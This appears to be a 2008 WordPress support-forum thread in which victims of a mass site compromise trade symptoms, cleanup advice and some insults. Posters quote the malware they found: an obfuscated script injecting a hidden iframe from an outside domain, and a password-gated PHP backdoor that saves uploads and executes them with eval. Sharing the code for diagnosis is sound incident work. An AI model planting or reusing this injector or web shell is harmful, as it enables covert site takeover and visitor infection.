got hacked

I also just got hacked like this. We don’t seem to have any plugins in-common, but I found that a lot of PHP files contained the following:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Very scary…

I was hacked just today as well with the same symptoms mentioned above (the ActiveX and the wp-stats, etc). This appears to be almost a bi-monthly thing and my friends and I started to suspect some sort of vulnerability in the theme I’m using (Hemmingway) – though this particular problem is new. Normally the posts are hacked with some sort of sql injection that causes the rest of the site to not load. It’s not normally this bad.

This was inserted into the bottom of ALL of my pages – they even got the 404.php! I’m going through and removing all the code now. It looks like I can’t even load /wp-admin/ either??

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

I have the following plugins:
Akismet
Awesomnews (not used or active though)
maintenance mode
pownce-for-wordpress (not yet used or active I don’t think – can’t confirm cuz I’m still cleaning up the code so I can login)
wordpress-automatic-upgrade
hello dolly
stats

They even got my plugins php files?!?
I also found some “pre_hello.php” file in my plugins directory. It looks like 3 pages of stuff – the first and last are all just carriage returns while the middle is code with lots of “testdata” bits.

The only plugin we have in common is Akismet.

I’ve done a fresh install and deactivated all plugins except Akismet. Could this be a hole in WordPress itself?

It’s not just wordpress

2 of my Joomla! installs have had the same problem, and one of my wordpress installs…

Any solution other than wiping and reinstalling?

Looks like they tagged all the php files – and even the files like the readme.html – though that file obviously doesn’t have the <?php tags in it.

There are these seemingly random files that start with pre_ that don’t appear to have any normal wordpress code in it. They have the page of blank space at the top and bottom. Looks like they found another php file and created a new file with that name but added “pre_” to the beginning?? “pre_hello.php” in the plugins directory, “pre_wp-cron.php” in the root directory…

Here’s the code:

<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','b40395b7ce76774c614419fbeb3dd9a9');

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["s"]["size"])) {
      if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
      {
      testdata('save_ok');
      };
      //eval($code);
  } else {
    testdata('save_fail');
  };

  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["f"]["size"]))
  {
      eval($code);
      testdata('ok');
  } else {
    testdata('fail');
  };

} else {
  testdata('pass');
};

testdata('end');
echo "</pre>";
?>

if you’ve been hacked on a previous version, and then upgraded to wp2.5.1, chances are you didn’t clear out all your files from your hosting space, and whatever was planted there by your hackers is still there.

a fresh install doesn’t mean anything if have not changed your passwords to *everything* including the DB and all privileged user accounts on your blog, or if you allowed any files to remain on your hosting space when you uploaded this fresh copy of wordpress.

the other possibility of course, is that your shared hosting environment is poorly configured to allow your neighbours to write into your space. In that case, no matter what you do, if Joe next door is hacked, so are you.

Another update –
Is anyone running Vanilla forum? If it started in wordpress, then it “leaked” into my forum as well. This is going to take forever to clean up.

@ivovic –
Yeah, I’m currently working on fresh installs with all new passwords, etc., on a new server. Hopefully this will help. (So far?) it’s only my old install on my old server.

so where are the wordpress people??

do we have to stay afraid of hackers every time a new version comes up??

And any solution to this problrn now?

**All my 4 domians hosted under the same account( not all using wordpress) are now down becuse some guys working on wordpress didn’t have time to check their code for bugs!

What I’m more interested in is how they got in in the first place. I’ve asked our sysadmin, who is pretty good at hunting down this sort of thing, to investigate our logs.

The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

just to inject something, pardon the pun, a plugin not being active as no bearing on whether or not its exploitable. An exploitable plugin isnt any less exploitable because its not active.

So where are the wordpress people??

do we have to stay afraid of hackers every time a new version comes up??

And any solution to this problrn now?

**All my 4 domians hosted under the same account( not all using wordpress) are now down becuse some guys working on wordpress didn’t have time to check their code for bugs!

Thats such crap.

I am using using wordpress 2.5 with the following plugins:

Maybe instead JUST joining this forum after you have been hacked, you should have been paying more attention.

https://www.ads-software.com/development/2008/04/wordpress-251/

Your complaint is moot dude, you arent even running a current version.

I’m talking to my server admin, and it’s apparently being caused by something from https://www.wp-stats-php.info/

Since I cant get to my admin panel I cannot tell you what file it is that does this.

@whooami, instead of wasting ur time evaluating how bad my comment is why don’t you go spent ur time finding a solution to the problem, i think it’s more useful for u.. who knows u may become a wordpress hero babe!

how about you drop dead, babe. Sounds like youre the one that needs to find the solution.

I never thought that I would think this, much less say it, but some people get what they deserve I guess. If you cannot be bothered to spend the little fucking time it takes to read the crap on your dashboard, and actually click a cpl links, then you have little right to come here and bash the people that work on this software. You’re a non-factor.